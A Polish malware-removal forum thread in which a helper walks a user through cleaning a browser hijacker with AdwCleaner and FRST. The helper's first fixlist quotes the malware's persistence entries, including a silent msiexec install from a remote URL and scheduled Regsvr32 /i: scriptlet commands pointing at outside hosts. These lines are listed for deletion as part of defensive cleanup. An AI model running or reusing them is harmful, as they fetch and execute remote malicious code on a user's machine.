Syf w Chromie, spowolnienie systemu i wykryty Win32: Adware-gen

scianaski · 22 Kwiecień 2017 10:56

Witam,
tak jak w temacie ostatnimi czasy mój system wyraźnie spowolnił, w Chromie samoistnie zmienia się strona startowa i domyślna wyszukiwarka, bywa też, że sam się wyłącza. Przeskanowałam system Avastem, żeby zobaczyć co się dzieje, wykryło kilka zarażonych plików, wszystkie poszły do kwarantanny. Myślałam, że problem ustanie, ale ciągle jest to samo.
Logi z FRST:
Shortcut
http://www.wklej.org/id/3092961/
FRST
http://www.wklej.org/id/3092962/
Addition
http://www.wklej.org/id/3092964/

Atis · 22 Kwiecień 2017 11:36

Pobierz i uruchom AdwCleaner Kliknij Skanuj (Scan) i później Oczyść (Clean).
Kliknij Skanuj (Scan) i pokaż nowy raport FRST i Addition.

scianaski · 22 Kwiecień 2017 12:52

FRST
http://www.wklej.org/id/3093105/
Addition
http://www.wklej.org/id/3093106/

Atis · 22 Kwiecień 2017 13:23

Czy celowo zainstalowałeś program: C:\Program Files (x86)\ScreenShot
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation) HKU\S-1-5-21-770818595-926527265-1375564449-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1WRTwxNYQQFdH2MkVWNYI1RUM8FTVQMjlLMWhQNYFcNH== /q IFEO\taskmgr.exe: [Debugger] CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ehgldbbpchgpcfagfpfjgoomddhccfgh] - <Brak Path/update_url> CHR HKLM-x32\...\Chrome\Extension: [bpegkgagfojjbcpkihigfmkojdmmimdf] - <Brak Path/update_url> R2 3DM; C:\Users\Magda\AppData\Local\3DM\Kitty.dll [754688 2017-04-18] (kitty.exe) [Brak podpisu cyfrowego] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] S3 dbx; system32\DRIVERS\dbx.sys [X] 2017-04-17 17:08 - 2017-04-17 17:08 - 00000000 ____D C:\Users\Magda\AppData\Local\Eastness 2017-04-17 17:08 - 2017-04-17 17:08 - 00000000 ____D C:\ProgramData\Software 2017-04-17 17:08 - 2017-04-17 17:08 - 00000000 ____D C:\Program Files (x86)\Eastness 2017-04-17 17:06 - 2017-04-17 17:06 - 00000000 ____D C:\Program Files (x86)\MIO 2017-04-17 17:01 - 2017-04-21 13:34 - 00000000 ____D C:\Program Files (x86)\BiaoJi 2017-03-28 23:13 - 2017-03-28 23:13 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsignccc3010b92dbd133 2017-03-28 23:09 - 2017-03-28 23:09 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsignac49bf54554d8b12 2017-03-28 23:09 - 2017-03-28 23:09 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsign2fbeb69d24b3c38c 2017-03-28 22:37 - 2017-03-28 22:37 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsignc0983e429857e877 2017-03-28 22:37 - 2017-03-28 22:37 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsign269ce8666934575f 2017-03-28 11:00 - 2017-03-28 11:00 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsignf45663c1de5eae97 2017-03-28 10:55 - 2017-03-28 10:55 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsign9614e6f6549514e6 2017-03-28 10:55 - 2017-03-28 10:55 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsign230beaa981e35a05 2017-03-28 10:54 - 2017-03-28 10:54 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsignd61d104705b491ba 2017-03-28 10:54 - 2017-03-28 10:54 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsign1acc2654d5915428 2017-03-28 10:54 - 2017-03-28 10:54 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsign0f4e00103462b336 2017-03-27 17:24 - 2017-03-27 17:24 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsigndace722522ae25f7 2017-03-27 17:24 - 2017-03-27 17:24 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsign2bb90cdd5dfc53c9 2017-03-27 17:20 - 2017-03-27 17:20 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsign13ce9a1fbfa85876 2017-03-27 17:16 - 2017-03-27 17:16 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsignd4d54f20aa800ea0 2017-03-27 17:15 - 2017-03-27 17:15 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsigna71f4d6b9fb15c76 2017-03-27 17:15 - 2017-03-27 17:15 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsign615d91c575df9f87 2017-03-27 17:15 - 2017-03-27 17:15 - 00000000 ____D C:\Users\Magda\AppData\Local\Tempzxpsign44aedf7065aed064 2017-04-22 14:28 - 2016-11-21 13:51 - 00000000 ____D C:\AdwCleaner 2017-04-14 21:57 - 2015-03-06 15:17 - 00000000 ____D C:\Temp Task: {1990AAFE-46D0-4BD7-B536-FA57383D939A} - System32\Tasks\avastBCLRestartS-1-5-21-770818595-926527265-1375564449-1001 => Chrome.exe Task: {1E7B9910-FC3A-4BD6-ADF3-E5EAE6D8A5F2} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku <==== UWAGA Task: {2ADA4BCC-ACAB-4D88-BF1B-B3F7C8A35F72} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA Task: {3772C55A-9964-4011-8E19-5FF3BB26FA20} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA Task: {4168B289-C688-4BBB-A6A6-5D3E2FE3F660} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku <==== UWAGA Task: {5FBE0915-FA1E-4AAB-9A2B-31A8C1E9E370} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA Task: {65E06951-F518-4398-9EA9-60D148969C91} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1WRTwxNYQQFdH2MkVWNYI1RUM8FTVQMjlLMWhQNYFcNH== scrobj.dll Task: {6CC5823E-7B1B-47C1-AF68-9F4D921873A0} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA Task: {6D0EEE79-8FC7-4E98-8E97-91D0A6901092} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA Task: {9A531C0C-BF15-4B85-943E-B9EDB763134F} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA Task: {9E8CBC26-DE87-4050-BA2D-6861C7AD73AB} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1WRTwxNYQQFdH2MkVWNYI1RUM8FTVQMjlLMWhQNYFcNH== scrobj.dll Task: {A5279020-D43B-44A7-A78C-38F6A741564B} - \CCleanerSkipUAC -> Brak pliku <==== UWAGA Task: {B89B6233-80DF-4C4C-9826-133C2B79B29A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA Task: {CCBAF0B7-B8BB-454A-9E02-8489F8F89362} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA Task: {CF798727-8ABD-46CA-9127-C6D182714BB5} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA Task: {FC437524-67D9-4138-9450-7069DE6B404D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA Shortcut: C:\Users\Magda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Magda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) C:\Users\Magda\AppData\cal\3DM C:\ProgramData\SWCUTemp EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.

scianaski · 23 Kwiecień 2017 18:12

Co do tego programu ScreenShot, nie mam pojęcia co to jest i skąd, nic takiego nie instalowałam.
Po naprawie z systemu zniknął mi Firefox i Chrome.

Fixlog
http://www.wklej.org/id/3094728/
FRST
http://www.wklej.org/id/3094734/

Atis · 23 Kwiecień 2017 19:41

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

CloseProcesses: R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited) 2017-04-23 20:02 - 2017-04-23 20:02 - 00000000 ____D C:\Users\Magda\AppData\LocalLow\Temp 2017-04-23 20:02 - 2017-04-23 20:02 - 00000000 ____D C:\ProgramData\SWCUTemp 2017-04-21 20:18 - 2017-04-21 20:18 - 00000000 ____D C:\Program Files (x86)\AlphaGo 2017-04-21 20:18 - 2017-04-21 20:18 - 00000000 _____ C:\WINDOWS\SysWOW64\33 2017-04-21 20:18 - 2017-04-21 20:18 - 00000000 _____ C:\WINDOWS\SysWOW64\11 2017-04-19 12:10 - 2017-04-19 12:10 - 00000000 ____D C:\Users\Magda\AppData\Local\3DM 2017-04-23 19:36 - 2013-09-19 19:13 - 33700864 ___SH C:\Users\Magda\Desktop\Thumbs.db 2017-04-13 21:14 - 2017-03-15 14:28 - 00000000 ____D C:\Users\Magda\AppData\Roaming\ScreenShot C:\Program Files (x86)\ScreenShot C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.

scianaski · 23 Kwiecień 2017 21:41

Fixlog
http://www.wklej.org/id/3095020/
FRST
http://www.wklej.org/id/3095019/

Atis · 23 Kwiecień 2017 22:14

Skasuj folder C:\FRST
Czyszczenie folderów Przywracania systemu
Przeczytaj w jaki sposób należy instalować programy: KLIK - KLIK - KLIK
Odinstaluj:
Adobe Flash Player 24 NPAPI
Java 8 Update 101
Java 8 Update 111
Java 8 Update 121
Java 8 Update 73
Java 8 Update 74
Microsoft Silverlight
Zainstaluj:
Flash Player 25.0.0.148 NPAPI
Java 8 Update 131
Silverlight 5.1.50906.0

scianaski · 23 Kwiecień 2017 22:41

Dzięki wielkie za pomoc!